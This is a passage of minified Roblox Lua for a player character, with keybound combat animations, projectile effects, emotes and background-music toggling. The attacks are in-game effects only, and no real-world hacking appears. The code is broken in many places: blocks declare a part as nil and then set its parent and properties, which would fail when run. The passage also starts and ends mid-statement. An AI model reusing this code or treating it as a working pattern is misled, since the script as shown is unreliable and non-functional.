hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,2.35/2)hQ.Position=Vector3.new(0,0,-2.35/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.Velocity=cf(hN.CFrame.p,hN.CFrame.p+vt(math.random(-10,10),math.random(-10,10),math.random(-10,10))).LookVector*100;RootPart.Velocity=vt()hN.Anchored=false;hN.CanCollide=true end))end;SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(10+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.2)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)wait(.2)dS=false end;function DominusAttack2()dS=true;RootPart.Anchored=true;coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;so("136597025",hN,4,1+math.random(-100,100)/1000)local hP=Torso.CFrame.p;hN.CFrame=cf(hP)hN.Size=vt(0,0,0)hN.Transparency=1;SetTween(hN,{Size=vt(16,16,16),Transparency=0},"Back","Out",0.45)Swait(0.45*30)hN.Attachment:FindFirstChildOfClass("ParticleEmitter").Enabled=false;SetTween(hN,{Size=vt(0,0,0),Transparency=1},"Quad","In",1)Swait(1.5*30)hN:Destroy()end))coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;local hP=Mouse.Hit.p;hN.CFrame=cf(hP+vt(0,1,0))hN.Size=vt(0,0,0)hN.Transparency=1;SetTween(hN,{Size=vt(12,12,12),Transparency=0},"Back","Out",0.45)Swait(0.45*30)RootPart.CFrame=CF(hP,hP+RootPart.CFrame.LookVector)so("244264383",hN,4,.75+math.random(-100,100)/1000)hN.Attachment:FindFirstChildOfClass("ParticleEmitter").Enabled=false;SetTween(hN,{Size=vt(0,0,0),Transparency=1},"Quad","In",1)Swait(1.5*30)hN:Destroy()end))Swait(0.45*30)local hS=math.random(1,10)if hS==1 then so("305018865",Head,5,1)elseif hS==2 then so("305018900",Head,5,1)elseif hS==3 then so("305018226",Head,3,1)elseif hS==4 then so("305019163",Head,5,1)end;RootPart.Anchored=false;dS=false end;function DominusAttack3()dS=true;so("305018836",Head,5,1)SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(50+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.2)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(-45),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)wait(.2)coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=true;hN.Anchored=true;hN.Transparency=0;hN.Size=vt(1,1,1)local hP=Mouse.Hit.p;local hT=(RightArm.CFrame*CF(0,-0.5,0)).p;so("136597028",hN,4,.5+math.random(-100,100)/1000)hN.CFrame=CF(hT)hN.Attachment:FindFirstChildOfClass("ParticleEmitter").Enabled=false;Swait()SetTween(hN,{Size=vt(50,50,50),Transparency=1,CFrame=CF(hT+CF(hT,hP).LookVector*200)},"Quad","Out",3)hN.Script.Disabled=false;hN.Val.Value=Character;Swait(3*30)hN:Destroy()end))SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(10+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.2)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)wait(.2)dS=false end;function DominusAttack4()dS=true;so("305018689",Head,5,1)SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(-40+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.4)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(10+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.4)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(120),math.rad(0),math.rad(0))},"Quad","Out",0.4)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.4)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.4)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.4)wait(.4)coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;hN.Transparency=1;hN.Size=vt(0,0,0)local hP=Mouse.Hit.p;so("145097353",Effects,1,2)SetTween(hN,{Size=vt(100,100,100),Transparency=0},"Back","Out",2)for T=1,10,0.1 do hN.CFrame=cf(hP+vt(0,400-400*T/10,0))Swait()end;so("145098006",Effects,1.5,1+math.random(-100,100)/1000)hN.Attachment:FindFirstChildOfClass("ParticleEmitter").Enabled=false;SetTween(hN,{Size=vt(360,360,360),Transparency=1},"Back","Out",2)hN.Script.Disabled=false;hN.Val.Value=Character;Swait(.25*30)hN.CanCollide=true;Swait(2.5*30)hN:Destroy()end))for T=1,60 do coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,20)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;local hP=Mouse.Hit.p;hN.Transparency=1;for T=1,10,0.1 do hN.CFrame=cf(hP+vt(0,400-400*T/10,0))Swait()end;hN.Transparency=0;local hQ=Instance.new("Attachment",hN)local hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,2.35/2)hQ.Position=Vector3.new(0,0,-2.35/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.Velocity=cf(hN.CFrame.p,hN.CFrame.p+vt(math.random(-10,10),math.random(-10,10),math.random(-10,10))).LookVector*math.random(100,300)RootPart.Velocity=vt()hN.Anchored=false;hN.CanCollide=true end))end;SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(50+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.5)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-30+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.5)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","Out",0.5)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.5)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.5)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.5)wait(.5)dS=false end;function Attack1()dS=true;coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=Effects;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=false;local hU=Instance.new("Weld",hN)hU.Part0=Torso;hU.Part1=hN;for T=1,6,0.5 do hU.C0=cf(0,T/5,-2.35/2)Swait()end;hU:Destroy()hN.Anchored=true;local hQ=Instance.new("Attachment",hN)local hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,2.35/2)hQ.Position=Vector3.new(0,0,-2.35/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.CFrame=RootPart.CFrame*cf(0,3,-.15)hN.Velocity=cf((RootPart.CFrame*cf(0,3,-1)).p,Target.p).LookVector*200;RootPart.Velocity=vt()hN.Anchored=false;hN.CanCollide=true end))SetTween(hI,{C0=RootCF*cn(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","In",0.2)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-50),math.rad(0),math.rad(0))},"Quad","In",0.2)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(110),math.rad(-40),math.rad(40))},"Quad","In",0.2)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(110),math.rad(40),math.rad(-40))},"Quad","In",0.2)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","In",0.2)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","In",0.2)Swait(.2*30)SetTween(hI,{C0=RootCF*cn(0,1,-.4)*angles(math.rad(-80),math.rad(0),math.rad(0))},"Back","Out",0.4)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-60),math.rad(0),math.rad(0))},"Back","Out",0.4)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(150),math.rad(-40),math.rad(-5))},"Back","Out",0.4)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(150),math.rad(40),math.rad(5))},"Back","Out",0.4)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(60),math.rad(0),math.rad(0))},"Back","Out",0.4)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-60),math.rad(0),math.rad(0))},"Back","Out",0.4)Swait(.2*30)so("457046851",Head,6,1+math.random(-100,100)/1000)ScreamFace()SetTween(hI,{C0=RootCF*cn(0,-1,-.6)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-50),math.rad(0),math.rad(0))},"Back","Out",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(120),math.rad(-40),math.rad(10))},"Back","Out",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(120),math.rad(40),math.rad(-10))},"Back","Out",0.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.1)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.1)Swait(.1*30)fixface()dS=false end;function Attack2()dS=true;coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=Effects;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=false;hN.Massless=true;local hU=Instance.new("Weld",hN)hU.Part0=Torso;hU.Part1=hN;for T=1,7,0.25 do hU.C0=cf(0,T/5,-6.28/2)Swait()end;hU:Destroy()hN.Anchored=true;hN.Massless=false;local hQ=Instance.new("Attachment",hN)local hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,6.28/2)hQ.Position=Vector3.new(0,0,-6.28/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.CFrame=RootPart.CFrame*cf(0,5,-.5)hN.Velocity=cf((RootPart.CFrame*cf(0,5,-.5)).p,Target.p).LookVector*400;RootPart.Velocity=vt()hN.Anchored=false;hN.CanCollide=true end))SetTween(hI,{C0=RootCF*cn(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","In",0.4)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-50),math.rad(0),math.rad(0))},"Quad","In",0.4)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(110),math.rad(-40),math.rad(40))},"Quad","In",0.4)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(110),math.rad(40),math.rad(-40))},"Quad","In",0.4)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","In",0.4)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","In",0.4)Swait(.4*30)SetTween(hI,{C0=RootCF*cn(0,1,-.4)*angles(math.rad(-80),math.rad(0),math.rad(0))},"Back","Out",0.6)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-60),math.rad(0),math.rad(0))},"Back","Out",0.6)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(150),math.rad(-40),math.rad(-5))},"Back","Out",0.6)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(150),math.rad(40),math.rad(5))},"Back","Out",0.6)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(60),math.rad(0),math.rad(0))},"Back","Out",0.6)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-60),math.rad(0),math.rad(0))},"Back","Out",0.6)Swait(.4*30)so("457046890",Head,6,1+math.random(-100,100)/1000)ScreamFace()SetTween(hI,{C0=RootCF*cn(0,-1,-.6)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-50),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(120),math.rad(-40),math.rad(10))},"Back","Out",0.3)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(120),math.rad(40),math.rad(-10))},"Back","Out",0.3)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(70),math.rad(0),math.rad(0))},"Back","Out",0.3)Swait(.3*30)fixface()dS=false end;function Yes()broseph=true;for T=1,5 do wait(0.125)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(30),math.rad(0),math.rad(0))},"Quad","InOut",0.15)wait(0.125)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-30),math.rad(0),math.rad(0))},"Quad","InOut",0.15)end;broseph=false;Humanoid.WalkSpeed=22*speed*PSize end;function No()broseph=true;for T=1,5 do wait(0.125)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(30))},"Quad","InOut",0.15)wait(0.125)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-30))},"Quad","InOut",0.15)end;broseph=false;Humanoid.WalkSpeed=22*speed*PSize end;function Attack3()dS=true;so("457046919",Head,6,1)SetTween(hI,{C0=RootCF*cn(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","In",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(50),math.rad(0),math.rad(0))},"Quad","In",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(45),math.rad(-20),math.rad(20))},"Quad","In",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(45),math.rad(20),math.rad(-20))},"Quad","In",0.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","In",0.1)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","In",0.1)Swait(.1*30)local hV=1;for T=1,160,10 do Swait(2)RootPart.Velocity=vt()ScreamFace()SetTween(hI,{C0=RootCF*cn(0,-1,0)*angles(math.rad(30+math.random(-12,12)),math.rad(0),math.rad(0+math.random(-2,2)))},"Quad","Out",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-30+math.random(-10,10)),math.rad(0),math.rad(0+math.random(-10,10)))},"Quad","Out",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(-T*9+math.random(-10,10)),math.rad(-40),math.rad(50+math.random(-10,10)))},"Quad","Out",.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(-T*9+180+math.random(-10,10)),math.rad(40),math.rad(-50+math.random(-10,10)))},"Quad","Out",.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(40),math.rad(0),math.rad(0))},"Quad","Out",0.1)hV=hV+1;if hV>4 then hV=1 end;if hV==1 then coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=Effects;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=false;local hU=Instance.new("Weld",hN)hU.Part0=RightArm;hU.Part1=hN;for T=1,4,0.5 do hU.C0=cf(0,-0.5-2.35/2,0)Swait()end;hU:Destroy()hN.Anchored=true;local hQ=Instance.new("Attachment",hN)local hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,2.35/2)hQ.Position=Vector3.new(0,0,-2.35/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.CFrame=RootPart.CFrame*cf(2,3,-.25)hN.Velocity=cf((RootPart.CFrame*cf(2,3,-.25)).p,Target.p).LookVector*400;hN.Anchored=false;hN.CanCollide=true end))end;if hV==3 then coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=Effects;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=false;local hU=Instance.new("Weld",hN)hU.Part0=LeftArm;hU.Part1=hN;for T=1,4,0.5 do hU.C0=cf(0,-0.5-2.35/2,0)Swait()end;hU:Destroy()hN.Anchored=true;local hQ=Instance.new("Attachment",hN)local hR=Instance.new("Attachment",hN)hR.Position=Vector3.new(0,0,2.35/2)hQ.Position=Vector3.new(0,0,-2.35/2)hO.Attachment0=hQ;hO.Attachment1=hR;hO.Texture="rbxassetid://1251856844"hO.Lifetime=0.1;hO.MaxLength=0;hO.MinLength=0;hO.TextureMode="Static"hO.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,.9),NumberSequenceKeypoint.new(1,1)})hO.WidthScale=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,0)})hO.LightEmission=0;hO.Color=ColorSequence.new(Color3.new(255/255,255/255,255/255),Color3.new(255/255,255/255,255/255))hO.LightEmission=.5;hO.FaceCamera=true;hN.Parent=workspace;hN.Script.Disabled=false;hN.Val.Value=Character;hN.CFrame=RootPart.CFrame*cf(-2,3,-.25)hN.Velocity=cf((RootPart.CFrame*cf(-2,3,-.25)).p,Target.p).LookVector*400;hN.Anchored=false;hN.CanCollide=true end))end end;for T=160,200,10 do Swait(2)ScreamFace()SetTween(hI,{C0=RootCF*cn(0,-1,0)*angles(math.rad(30+math.random(-12,12)),math.rad(0),math.rad(0+math.random(-2,2)))},"Quad","Out",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-30+math.random(-10,10)),math.rad(0),math.rad(0+math.random(-10,10)))},"Quad","Out",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(-T*9+math.random(-10,10)),math.rad(-40),math.rad(50+math.random(-10,10)))},"Quad","Out",.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(-T*9+180+math.random(-10,10)),math.rad(40),math.rad(-50+math.random(-10,10)))},"Quad","Out",.1)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(40),math.rad(0),math.rad(0))},"Quad","Out",0.1)end;fixface()SetTween(hI,{C0=RootCF*cn(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Back","Out",0.15)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Back","Out",0.15)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(120),math.rad(-40),math.rad(50))},"Back","Out",.15)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(120),math.rad(40),math.rad(-50))},"Back","Out",.15)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(30),math.rad(0),math.rad(0))},"Back","Out",0.15)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-40),math.rad(0),math.rad(0))},"Back","Out",0.15)Swait(.15*30)dS=false end;function Attack6()for T,v in pairs(GatherAllInstances(Effects))do if v.Name=="Zombie"then v.Parent:Destroy()end end end;function ClickCombo()if N=="Fall"or N=="Jump"then if Combo==0 then end else if Combo==0 then AT1()Combo=1 elseif Combo==1 then AT2()Combo=2 elseif Combo==2 then AT3()Combo=0 end end end;local Hold=false;Mouse.Button1Down:connect(function()end)Mouse.Button1Up:connect(function()if Hold==true then Hold=false end end)Mouse.KeyUp:connect(function(dr)end)Mouse.KeyDown:connect(function(dr)if dr=="z"and dS==false then if mememode==false then Attack1()else DominusAttack1()end end;if dr=="x"and dS==false then if mememode==false then Attack2()else DominusAttack2()end end;if dr=="c"and dS==false then if mememode==false then Attack3()else DominusAttack3()end end;if dr=="v"and dS==false then if mememode==true then DominusAttack4()end end;if dr=="r"and dS==false then Reload()end;if dr=="t"and dS==false then end;if dr=="p"and dS==false then if mememode==false and feral==false then mememode=true;so("305018411",Head,6,1)dZ="http://www.roblox.com/asset/?id=1529319757"fixface()lastsongpos=0;d_.TimePosition=lastsongpos else dZ="http://www.roblox.com/asset/?id=231316492"mememode=false;fixface()e0=e0-1 end end;if dr=="0"then if isruning==false then isruning=true end end;if dr=="g"then No()end;if dr=="f"then Yes()end;if dr=="h"and dS==false then if mememode==false and feral==false then feral=true else feral=false end end;if dr=="m"then if playsong==true then playsong=false;d_:stop()elseif playsong==false then playsong=true;d_:play()end end;if dr=="n"and mememode==false then e0=e0+1;if e0>3 then e0=1 end;warn("now playing song Nr"..e0)if e0==1 then dZ="http://www.roblox.com/asset/?id=231316492"elseif e0==2 then dZ="http://www.roblox.com/asset/?id=2166080120"elseif e0==3 then dZ="http://www.roblox.com/asset/?id=322332293"end;lastsongpos=0;d_.TimePosition=lastsongpos end end)coroutine.resume(coroutine.create(function()while Humanoid.Health>0.001 do dQ=dQ+dR;hitfloor=rayCast(RootPart.Position,CFrame.new(RootPart.Position,RootPart.Position-Vector3.new(0,1,0)).lookVector,4,Character)local hW=(Humanoid.MoveDirection*Vector3.new(1,0,1)).magnitude;local hX=RootPart.Velocity.y;if RootPart.Velocity.y>1 and hitfloor==nil then N="Jump"elseif RootPart.Velocity.y<-1 and hitfloor==nil then N="Fall"elseif Humanoid.Sit==true then N="Sit"elseif hW==0 and hitfloor~=nil then N="Idle"elseif hW>0 and hitfloor~=nil then N="Walk"else N=""end;local hY=RootPart.CFrame;local hZ=Humanoid.MoveDirection*hY.LookVector;local h_=Humanoid.MoveDirection*hY.RightVector;dU=hZ.X+hZ.Z;dV=h_.X+h_.Z;coroutine.resume(coroutine.create(function()game:GetService("Players").LocalPlayer.Character.ParticleEmitter:Destroy()game:GetService("Players").LocalPlayer.Character.ParticleEmitter:Destroy()end))coroutine.resume(coroutine.create(function()if d_.Parent==nil or d_==nil then d_=e1:Clone()d_.Parent=Torso;d_.Name="BGMusic"d_.Pitch=1;d_.Volume=1.5;d_.Looped=true;d_.archivable=false;d_.TimePosition=lastsongpos;if playsong==true then d_:play()elseif playsong==false then d_:stop()end else lastsongpos=d_.TimePosition;d_.Pitch=1;d_.Volume=1.5;d_.Looped=true;d_.SoundId=dZ;d_.EmitterSize=30 end end))dO=hW*1;if dO>30 then dO=30 end;dO=dO/1.5;if dS==false then if N=="Jump"then dR=0.60*2;SetTween(hI,{C0=RootCF*cn(0,0+0.0395/2*math.cos(dQ/8),-0.1+0.0395*math.cos(dQ/8))*angles(math.rad(-6.5-1.5*math.cos(dQ/8))+dO*dU/2,math.rad(0)-dO*dV/2,math.rad(0))},"Quad","Out",0.25)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-26.5+2.5*math.cos(dQ/8)),math.rad(0),math.rad(-0))},"Quad","Out",0.25)SetTween(RW,{C0=cn(1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(140-2*math.cos(dQ/8)),math.rad(-5),math.rad(8+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(140-2*math.cos(dQ/8)),math.rad(5),math.rad(-8-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-0.85+.05*math.cos(dQ/15),-.2)*CFrame.Angles(math.rad(-15-1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InO